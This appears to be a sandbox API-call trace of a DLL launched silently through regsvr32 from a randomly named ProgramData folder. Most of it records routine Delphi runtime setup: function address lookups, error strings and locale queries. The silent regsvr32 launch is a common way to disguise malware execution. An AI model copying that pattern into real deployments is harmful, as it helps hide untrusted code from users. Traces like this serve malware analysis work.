[0086.114] GetProcAddress (hModule=0x75370000, lpProcName="CreateThread") returned 0x753c375d
[0086.114] GetProcAddress (hModule=0x75370000, lpProcName="CreateProcessA") returned 0x75372082
[0086.114] GetProcAddress (hModule=0x75370000, lpProcName="CreateFileA") returned 0x753bcee8
[0086.114] GetProcAddress (hModule=0x75370000, lpProcName="CreateEventA") returned 0x753b0ef7
[0086.114] GetProcAddress (hModule=0x75370000, lpProcName="CompareStringA") returned 0x753b0f4a
[0086.114] GetProcAddress (hModule=0x75370000, lpProcName="CloseHandle") returned 0x753bca7c
[0086.114] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x173288c, cbMultiByte=11, lpWideCharStr=0xed1a0, cchWideChar=2047 | out: lpWideCharStr="version.dlll") returned 11
[0086.115] LoadLibraryW (lpLibFileName="version.dll") returned 0x745c0000
[0086.115] GetProcAddress (hModule=0x745c0000, lpProcName="VerQueryValueA") returned 0x745c1b72
[0086.115] GetProcAddress (hModule=0x745c0000, lpProcName="GetFileVersionInfoSizeA") returned 0x745c1c9c
[0086.115] GetProcAddress (hModule=0x745c0000, lpProcName="GetFileVersionInfoA") returned 0x745c1ced
[0086.115] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x173288c, cbMultiByte=9, lpWideCharStr=0xed1a0, cchWideChar=2047 | out: lpWideCharStr="gdi32.dlllll") returned 9
[0086.115] LoadLibraryW (lpLibFileName="gdi32.dll") returned 0x75880000
[0086.115] GetProcAddress (hModule=0x75880000, lpProcName="UnrealizeObject") returned 0x7588fb63
[0086.115] GetProcAddress (hModule=0x75880000, lpProcName="StretchBlt") returned 0x7588f467
[0086.115] GetProcAddress (hModule=0x75880000, lpProcName="SetWindowOrgEx") returned 0x75888546
[0086.115] GetProcAddress (hModule=0x75880000, lpProcName="SetViewportOrgEx") returned 0x7588834f
[0086.116] GetProcAddress (hModule=0x75880000, lpProcName="SetTextColor") returned 0x75886906
[0086.116] GetProcAddress (hModule=0x75880000, lpProcName="SetStretchBltMode") returned 0x75887705
[0086.116] GetProcAddress (hModule=0x75880000, lpProcName="SetROP2") returned 0x7588f9e0
[0086.116] GetProcAddress (hModule=0x75880000, lpProcName="SetPixel") returned 0x758a14f3
[0086.116] GetProcAddress (hModule=0x75880000, lpProcName="SetDIBColorTable") returned 0x758a1492
[0086.116] GetProcAddress (hModule=0x75880000, lpProcName="SetBrushOrgEx") returned 0x7588c4c5
[0086.116] GetProcAddress (hModule=0x75880000, lpProcName="SetBkMode") returned 0x758869b1
[0086.116] GetProcAddress (hModule=0x75880000, lpProcName="SetBkColor") returned 0x75886a3c
[0086.116] GetProcAddress (hModule=0x75880000, lpProcName="SelectPalette") returned 0x7588a1f6
[0086.116] GetProcAddress (hModule=0x75880000, lpProcName="SelectObject") returned 0x75886640
[0086.116] GetProcAddress (hModule=0x75880000, lpProcName="SaveDC") returned 0x7588a74b
[0086.117] GetProcAddress (hModule=0x75880000, lpProcName="RestoreDC") returned 0x7588a67b
[0086.117] GetProcAddress (hModule=0x75880000, lpProcName="RectVisible") returned 0x75888f13
[0086.117] GetProcAddress (hModule=0x75880000, lpProcName="RealizePalette") returned 0x7588ef91
[0086.117] GetProcAddress (hModule=0x75880000, lpProcName="PatBlt") returned 0x758862af
[0086.117] GetProcAddress (hModule=0x75880000, lpProcName="MoveToEx") returned 0x75888c21
[0086.117] GetProcAddress (hModule=0x75880000, lpProcName="MaskBlt") returned 0x7588c7ad
[0086.117] GetProcAddress (hModule=0x75880000, lpProcName="LineTo") returned 0x7588f59b
[0086.117] GetProcAddress (hModule=0x75880000, lpProcName="IntersectClipRect") returned 0x75887dfe
[0086.117] GetProcAddress (hModule=0x75880000, lpProcName="GetWindowOrgEx") returned 0x7588d1bf
[0086.117] GetProcAddress (hModule=0x75880000, lpProcName="GetTextMetricsA") returned 0x7588d0f2
[0086.117] GetProcAddress (hModule=0x75880000, lpProcName="GetTextExtentPoint32A") returned 0x758907b0
[0086.118] GetProcAddress (hModule=0x75880000, lpProcName="GetSystemPaletteEntries") returned 0x7588c2e1
[0086.118] GetProcAddress (hModule=0x75880000, lpProcName="GetStockObject") returned 0x75885ddf
[0086.118] GetProcAddress (hModule=0x75880000, lpProcName="GetPixel") returned 0x7588c3d5
[0086.118] GetProcAddress (hModule=0x75880000, lpProcName="GetPaletteEntries") returned 0x7588c2aa
[0086.118] GetProcAddress (hModule=0x75880000, lpProcName="GetObjectA") returned 0x7588914f
[0086.118] GetProcAddress (hModule=0x75880000, lpProcName="GetDeviceCaps") returned 0x75886f7f
[0086.118] GetProcAddress (hModule=0x75880000, lpProcName="GetDIBits") returned 0x7588a23b
[0086.118] GetProcAddress (hModule=0x75880000, lpProcName="GetDIBColorTable") returned 0x7588a149
[0086.118] GetProcAddress (hModule=0x75880000, lpProcName="GetDCOrgEx") returned 0x7588fa75
[0086.118] GetProcAddress (hModule=0x75880000, lpProcName="GetCurrentPositionEx") returned 0x75888d78
[0086.118] GetProcAddress (hModule=0x75880000, lpProcName="GetClipBox") returned 0x75888525
[0086.119] GetProcAddress (hModule=0x75880000, lpProcName="GetBrushOrgEx") returned 0x7588c943
[0086.119] GetProcAddress (hModule=0x75880000, lpProcName="GetBitmapBits") returned 0x7588c1ba
[0086.119] GetProcAddress (hModule=0x75880000, lpProcName="ExcludeClipRect") returned 0x75889218
[0086.119] GetProcAddress (hModule=0x75880000, lpProcName="DeleteObject") returned 0x75885f14
[0086.119] GetProcAddress (hModule=0x75880000, lpProcName="DeleteDC") returned 0x75886eaa
[0086.119] GetProcAddress (hModule=0x75880000, lpProcName="CreateSolidBrush") returned 0x75886b49
[0086.119] GetProcAddress (hModule=0x75880000, lpProcName="CreatePenIndirect") returned 0x7589744d
[0086.119] GetProcAddress (hModule=0x75880000, lpProcName="CreatePalette") returned 0x7588b1b0
[0086.119] GetProcAddress (hModule=0x75880000, lpProcName="CreateHalftonePalette") returned 0x7588c2cd
[0086.119] GetProcAddress (hModule=0x75880000, lpProcName="CreateFontIndirectA") returned 0x7588d22d
[0086.119] GetProcAddress (hModule=0x75880000, lpProcName="CreateDIBitmap") returned 0x7588a379
[0086.120] GetProcAddress (hModule=0x75880000, lpProcName="CreateDIBSection") returned 0x75888850
[0086.120] GetProcAddress (hModule=0x75880000, lpProcName="CreateCompatibleDC") returned 0x75886888
[0086.120] GetProcAddress (hModule=0x75880000, lpProcName="CreateCompatibleBitmap") returned 0x758873ad
[0086.120] GetProcAddress (hModule=0x75880000, lpProcName="CreateBrushIndirect") returned 0x7588993c
[0086.120] GetProcAddress (hModule=0x75880000, lpProcName="CreateBitmap") returned 0x75886b79
[0086.120] GetProcAddress (hModule=0x75880000, lpProcName="BitBlt") returned 0x758872c0
[0086.120] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x173288c, cbMultiByte=10, lpWideCharStr=0xed1a0, cchWideChar=2047 | out: lpWideCharStr="user32.dllll") returned 10
[0086.120] LoadLibraryW (lpLibFileName="user32.dll") returned 0x757b0000
[0086.120] GetProcAddress (hModule=0x757b0000, lpProcName="CreateWindowExA") returned 0x757bbf40
[0086.120] GetProcAddress (hModule=0x757b0000, lpProcName="WindowFromPoint") returned 0x757e6be9
[0086.121] GetProcAddress (hModule=0x757b0000, lpProcName="WinHelpA") returned 0x757d471e
[0086.121] GetProcAddress (hModule=0x757b0000, lpProcName="WaitMessage") returned 0x757c66bd
[0086.121] GetProcAddress (hModule=0x757b0000, lpProcName="UpdateWindow") returned 0x757bffa8
[0086.121] GetProcAddress (hModule=0x757b0000, lpProcName="UnregisterClassA") returned 0x757b8d70
[0086.121] GetProcAddress (hModule=0x757b0000, lpProcName="UnhookWindowsHookEx") returned 0x757badf9
[0086.121] GetProcAddress (hModule=0x757b0000, lpProcName="TranslateMessage") returned 0x757c64c7
[0086.121] GetProcAddress (hModule=0x757b0000, lpProcName="TranslateMDISysAccel") returned 0x757e1a5a
[0086.121] GetProcAddress (hModule=0x757b0000, lpProcName="TrackPopupMenu") returned 0x757d2228
[0086.121] GetProcAddress (hModule=0x757b0000, lpProcName="SystemParametersInfoA") returned 0x757b80e0
[0086.121] GetProcAddress (hModule=0x757b0000, lpProcName="ShowWindow") returned 0x757bf2a9
[0086.122] GetProcAddress (hModule=0x757b0000, lpProcName="ShowScrollBar") returned 0x757e3c89
[0086.122] GetProcAddress (hModule=0x757b0000, lpProcName="ShowOwnedPopups") returned 0x757e28ca
[0086.122] GetProcAddress (hModule=0x757b0000, lpProcName="ShowCursor") returned 0x757b64d3
[0086.122] GetProcAddress (hModule=0x757b0000, lpProcName="SetWindowsHookExA") returned 0x757e6d0c
[0086.122] GetProcAddress (hModule=0x757b0000, lpProcName="SetWindowPos") returned 0x757c1bc4
[0086.122] GetProcAddress (hModule=0x757b0000, lpProcName="SetWindowPlacement") returned 0x757b7f78
[0086.122] GetProcAddress (hModule=0x757b0000, lpProcName="SetWindowLongA") returned 0x757b8ba3
[0086.122] GetProcAddress (hModule=0x757b0000, lpProcName="SetTimer") returned 0x757c52ef
[0086.122] GetProcAddress (hModule=0x757b0000, lpProcName="SetScrollRange") returned 0x757b8ec5
[0086.122] GetProcAddress (hModule=0x757b0000, lpProcName="SetScrollPos") returned 0x757e04be
[0086.122] GetProcAddress (hModule=0x757b0000, lpProcName="SetScrollInfo") returned 0x757c48da
[0086.123] GetProcAddress (hModule=0x757b0000, lpProcName="SetRect") returned 0x757c498b
[0086.123] GetProcAddress (hModule=0x757b0000, lpProcName="SetPropA") returned 0x757e28e5
[0086.123] GetProcAddress (hModule=0x757b0000, lpProcName="SetParent") returned 0x757b8314
[0086.123] GetProcAddress (hModule=0x757b0000, lpProcName="SetMenuItemInfoA") returned 0x757d6d15
[0086.123] GetProcAddress (hModule=0x757b0000, lpProcName="SetMenu") returned 0x757e6b0e
[0086.123] GetProcAddress (hModule=0x757b0000, lpProcName="SetForegroundWindow") returned 0x757bb225
[0086.123] GetProcAddress (hModule=0x757b0000, lpProcName="SetFocus") returned 0x757babad
[0086.123] GetProcAddress (hModule=0x757b0000, lpProcName="SetCursor") returned 0x757c3075
[0086.123] GetProcAddress (hModule=0x757b0000, lpProcName="SetClassLongA") returned 0x757e1236
[0086.123] GetProcAddress (hModule=0x757b0000, lpProcName="SetCapture") returned 0x757e6932
[0086.123] GetProcAddress (hModule=0x757b0000, lpProcName="SetActiveWindow") returned 0x757c333a
[0086.124] GetProcAddress (hModule=0x757b0000, lpProcName="SendMessageA") returned 0x757bad60
[0086.124] GetProcAddress (hModule=0x757b0000, lpProcName="ScrollWindow") returned 0x757dfc1d
[0086.124] GetProcAddress (hModule=0x757b0000, lpProcName="ScreenToClient") returned 0x757ba506
[0086.124] GetProcAddress (hModule=0x757b0000, lpProcName="RemovePropA") returned 0x757e2551
[0086.124] GetProcAddress (hModule=0x757b0000, lpProcName="RemoveMenu") returned 0x757b86e8
[0086.124] GetProcAddress (hModule=0x757b0000, lpProcName="ReleaseDC") returned 0x757c5421
[0086.124] GetProcAddress (hModule=0x757b0000, lpProcName="ReleaseCapture") returned 0x757e69f2
[0086.124] GetProcAddress (hModule=0x757b0000, lpProcName="RegisterWindowMessageA") returned 0x757bc091
[0086.124] GetProcAddress (hModule=0x757b0000, lpProcName="RegisterClipboardFormatA") returned 0x757bc091
[0086.124] GetProcAddress (hModule=0x757b0000, lpProcName="RegisterClassA") returned 0x757bbc6a
[0086.124] GetProcAddress (hModule=0x757b0000, lpProcName="RedrawWindow") returned 0x757c29bc
[0086.125] GetProcAddress (hModule=0x757b0000, lpProcName="PtInRect") returned 0x757c2392
[0086.125] GetProcAddress (hModule=0x757b0000, lpProcName="PostQuitMessage") returned 0x757bb308
[0086.125] GetProcAddress (hModule=0x757b0000, lpProcName="PostMessageA") returned 0x757bb446
[0086.125] GetProcAddress (hModule=0x757b0000, lpProcName="PeekMessageA") returned 0x757c19a5
[0086.125] GetProcAddress (hModule=0x757b0000, lpProcName="OffsetRect") returned 0x757ccdab
[0086.125] GetProcAddress (hModule=0x757b0000, lpProcName="OemToCharA") returned 0x7580f041
[0086.125] GetProcAddress (hModule=0x757b0000, lpProcName="MessageBoxA") returned 0x7580ea11
[0086.125] GetProcAddress (hModule=0x757b0000, lpProcName="MapWindowPoints") returned 0x757c5caa
[0086.125] GetProcAddress (hModule=0x757b0000, lpProcName="MapVirtualKeyA") returned 0x757e6038
[0086.125] GetProcAddress (hModule=0x757b0000, lpProcName="LoadStringA") returned 0x757b66a7
[0086.125] GetProcAddress (hModule=0x757b0000, lpProcName="LoadKeyboardLayoutA") returned 0x757fc892
[0086.126] GetProcAddress (hModule=0x757b0000, lpProcName="LoadIconA") returned 0x757b64ad
[0086.126] GetProcAddress (hModule=0x757b0000, lpProcName="LoadCursorA") returned 0x757b8328
[0086.126] GetProcAddress (hModule=0x757b0000, lpProcName="LoadBitmapA") returned 0x757e1608
[0086.126] GetProcAddress (hModule=0x757b0000, lpProcName="KillTimer") returned 0x757c64f7
[0086.126] GetProcAddress (hModule=0x757b0000, lpProcName="IsZoomed") returned 0x757c4ce9
[0086.126] GetProcAddress (hModule=0x757b0000, lpProcName="IsWindowVisible") returned 0x757c4d69
[0086.126] GetProcAddress (hModule=0x757b0000, lpProcName="IsWindowEnabled") returned 0x757ba9b9
[0086.126] GetProcAddress (hModule=0x757b0000, lpProcName="IsWindow") returned 0x757c53ba
[0086.127] GetKeyboardType (nTypeFlag=0) returned 4
[0086.127] GetCommandLineA () returned="\"C:\\Windows\\System32\\regsvr32.exe\" /s \"C:\\ProgramData\\xxx6000137xx\\marxvxinhhm64528113361.dll\""
[0086.127] GetStartupInfoA (in: lpStartupInfo=0xee234 | out: lpStartupInfo=0xee234*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\regsvr32.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0086.127] GetVersion () returned 0x1db10106
[0086.127] GetVersion () returned 0x1db10106
[0086.127] GetCurrentThreadId () returned 0xf10
[0086.127] GetModuleFileNameA (in: hModule=0x160000, lpFilename=0xedd30, nSize=0x105 | out: lpFilename="lÝ\x0e" (normalized: "c:\\windows\\system32\\lý\x0e")) returned 0x0
[0086.127] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xedc0b, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\regsvr32.exe" (normalized: "c:\\windows\\system32\\regsvr32.exe")) returned 0x20
[0086.127] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xedd20 | out: phkResult=0xedd20*=0x0) returned 0x2
[0086.127] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xedd20 | out: phkResult=0xedd20*=0x0) returned 0x2
[0086.127] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xedd20 | out: phkResult=0xedd20*=0x0) returned 0x2
[0086.127] lstrcpynA (in: lpString1=0xedc0b, lpString2="lÝ\x0e", iMaxLength=261 | out: lpString1="lÝ\x0e") returned="lÝ\x0e"
[0086.127] GetThreadLocale () returned 0x409
[0086.127] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0xedd1b, cchData=5 | out: lpLCData="ENU") returned 4
[0086.127] lstrlenA (lpString="lÝ\x0e") returned 3
[0086.127] LoadStringA (in: hInstance=0x160000, uID=0xffdf, lpBuffer=0xede54, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0086.127] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x1faea0
[0086.128] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1790000
[0086.128] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x1fbea0
[0086.128] VirtualAlloc (lpAddress=0x1790000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1790000
[0086.128] LoadStringA (in: hInstance=0x160000, uID=0xffde, lpBuffer=0xede54, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0086.128] LoadStringA (in: hInstance=0x160000, uID=0xffdc, lpBuffer=0xede54, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0086.128] LoadStringA (in: hInstance=0x160000, uID=0xffdd, lpBuffer=0xede54, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0086.128] LoadStringA (in: hInstance=0x160000, uID=0xffd0, lpBuffer=0xede54, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0086.129] LoadStringA (in: hInstance=0x160000, uID=0xffd8, lpBuffer=0xede54, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0086.129] LoadStringA (in: hInstance=0x160000, uID=0xffef, lpBuffer=0xede54, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0086.129] LoadStringA (in: hInstance=0x160000, uID=0xffec, lpBuffer=0xede54, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0086.129] LoadStringA (in: hInstance=0x160000, uID=0xffd3, lpBuffer=0xede54, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0086.129] LoadStringA (in: hInstance=0x160000, uID=0xffd2, lpBuffer=0xede54, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0086.129] LoadStringA (in: hInstance=0x160000, uID=0xffe5, lpBuffer=0xede54, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0086.129] LoadStringA (in: hInstance=0x160000, uID=0xffe6, lpBuffer=0xede54, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0086.129] LoadStringA (in: hInstance=0x160000, uID=0xffe7, lpBuffer=0xede54, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0086.129] LoadStringA (in: hInstance=0x160000, uID=0xffe4, lpBuffer=0xede54, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0086.129] LoadStringA (in: hInstance=0x160000, uID=0xffe2, lpBuffer=0xede54, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0086.129] LoadStringA (in: hInstance=0x160000, uID=0xffe0, lpBuffer=0xede54, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0086.129] LoadStringA (in: hInstance=0x160000, uID=0xffff, lpBuffer=0xede54, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0086.129] LoadStringA (in: hInstance=0x160000, uID=0xfffe, lpBuffer=0xede54, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0086.129] LoadStringA (in: hInstance=0x160000, uID=0xfffd, lpBuffer=0xede54, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0086.129] LoadStringA (in: hInstance=0x160000, uID=0xfffc, lpBuffer=0xede54, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0086.129] LoadStringA (in: hInstance=0x160000, uID=0xfffb, lpBuffer=0xede54, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0086.129] LoadStringA (in: hInstance=0x160000, uID=0xfffa, lpBuffer=0xede54, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0086.129] LoadStringA (in: hInstance=0x160000, uID=0xfff9, lpBuffer=0xede54, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0086.129] LoadStringA (in: hInstance=0x160000, uID=0xfff8, lpBuffer=0xede54, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0086.129] LoadStringA (in: hInstance=0x160000, uID=0xfff7, lpBuffer=0xede54, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0086.129] LoadStringA (in: hInstance=0x160000, uID=0xfff6, lpBuffer=0xede54, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0086.129] LoadStringA (in: hInstance=0x160000, uID=0xfff5, lpBuffer=0xede54, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0086.129] LoadStringA (in: hInstance=0x160000, uID=0xfff4, lpBuffer=0xede54, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0086.129] LoadStringA (in: hInstance=0x160000, uID=0xfff3, lpBuffer=0xede54, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0086.129] LoadStringA (in: hInstance=0x160000, uID=0xfff1, lpBuffer=0xede40, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0086.129] LoadStringA (in: hInstance=0x160000, uID=0xffe1, lpBuffer=0xede40, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0086.129] GetVersionExA (in: lpVersionInformation=0xee1d8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0xee284, dwMinorVersion=0x76f3e0ed, dwBuildNumber=0xa56ec, dwPlatformId=0xfffffffe, szCSDVersion="\x3c\x9f\xf7\x76\x37\x1f\x37\x75\x2c\x60\x43\x75\x80\x94\x1f") | out: lpVersionInformation=0xee1d8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0086.130] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0086.130] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0086.130] GetThreadLocale () returned 0x409
[0086.130] GetThreadLocale () returned 0x409
[0086.130] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0xee0b0, cchData=256 | out: lpLCData="Jan") returned 4
[0086.130] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0xee0b0, cchData=256 | out: lpLCData="January") returned 8
[0086.130] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0xee0b0, cchData=256 | out: lpLCData="Feb") returned 4
[0086.130] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0xee0b0, cchData=256 | out: lpLCData="February") returned 9
[0086.130] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0xee0b0, cchData=256 | out: lpLCData="Mar") returned 4
[0086.130] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0xee0b0, cchData=256 | out: lpLCData="March") returned 6
[0086.130] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0xee0b0, cchData=256 | out: lpLCData="Apr") returned 4
[0086.130] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0xee0b0, cchData=256 | out: lpLCData="April") returned 6
[0086.130] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0xee0b0, cchData=256 | out: lpLCData="May") returned 4
[0086.130] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0xee0b0, cchData=256 | out: lpLCData="May") returned 4
[0086.130] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0xee0b0, cchData=256 | out: lpLCData="Jun") returned 4
[0086.130] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0xee0b0, cchData=256 | out: lpLCData="June") returned 5
[0086.130] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0xee0b0, cchData=256 | out: lpLCData="Jul") returned 4
[0086.130] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0xee0b0, cchData=256 | out: lpLCData="July") returned 5
[0086.130] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0xee0b0, cchData=256 | out: lpLCData="Aug") returned 4
[0086.130] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0xee0b0, cchData=256 | out: lpLCData="August") returned 7
[0086.130] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0xee0b0, cchData=256 | out: lpLCData="Sep") returned 4
[0086.130] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0xee0b0, cchData=256 | out: lpLCData="September") returned 10
[0086.130] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0xee0b0, cchData=256 | out: lpLCData="Oct") returned 4
[0086.130] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0xee0b0, cchData=256 | out: lpLCData="October") returned 8
[0086.130] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0xee0b0, cchData=256 | out: lpLCData="Nov") returned 4
[0086.130] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0xee0b0, cchData=256 | out: lpLCData="November") returned 9
[0086.130] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0xee0b0, cchData=256 | out: lpLCData="Dec") returned 4
[0086.130] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0xee0b0, cchData=256 | out: lpLCData="December") returned 9
[0086.130] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0xee0b0, cchData=256 | out: lpLCData="Sun") returned 4
[0086.131] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0xee0b0, cchData=256 | out: lpLCData="Sunday") returned 7
[0086.131] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0xee0b0, cchData=256 | out: lpLCData="Mon") returned 4
[0086.131] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0xee0b0, cchData=256 | out: lpLCData="Monday") returned 7
[0086.131] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0xee0b0, cchData=256 | out: lpLCData="Tue") returned 4
[0086.131] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0xee0b0, cchData=256 | out: lpLCData="Tuesday") returned 8
[0086.131] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0xee0b0, cchData=256 | out: lpLCData="Wed") returned 4
[0086.131] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0xee0b0, cchData=256 | out: lpLCData="Wednesday") returned 10
[0086.131] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0xee0b0, cchData=256 | out: lpLCData="Thu") returned 4
[0086.131] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0xee0b0, cchData=256 | out: lpLCData="Thursday") returned 9
[0086.131] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0xee0b0, cchData=256 | out: lpLCData="Fri") returned 4
[0086.131] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0xee0b0, cchData=256 | out: lpLCData="Friday") returned 7
[0086.131] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0xee0b0, cchData=256 | out: lpLCData="Sat") returned 4
[0086.131] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0xee0b0, cchData=256 | out: lpLCData="Saturday") returned 9
[0086.131] GetThreadLocale () returned 0x409
[0086.131] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0xee10c, cchData=256 | out: lpLCData="$") returned 2
[0086.131] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0xee10c, cchData=256 | out: lpLCData="0") returned 2
[0086.131] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0xee10c, cchData=256 | out: lpLCData="0") returned 2
[0086.131] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0xee204, cchData=2 | out: lpLCData=",") returned 2
[0086.131] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0xee204, cchData=2 | out: lpLCData=".") returned 2
[0086.131] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0xee10c, cchData=256 | out: lpLCData="2") returned 2
[0086.131] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0xee204, cchData=2 | out: lpLCData="/") returned 2
[0086.131] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0xee10c, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0086.131] GetThreadLocale () returned 0x409
[0086.131] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0xee0d8, cchData=256 | out: lpLCData="1") returned 2
[0086.131] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0xee10c, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0086.131] GetThreadLocale () returned 0x409
[0086.131] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0xee0d8, cchData=256 | out: lpLCData="1") returned 2
[0086.131] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0xee204, cchData=2 | out: lpLCData=":") returned 2
[0086.131] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0xee10c, cchData=256 | out: lpLCData="AM") returned 3
[0086.131] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0xee10c, cchData=256 | out: lpLCData="PM") returned 3
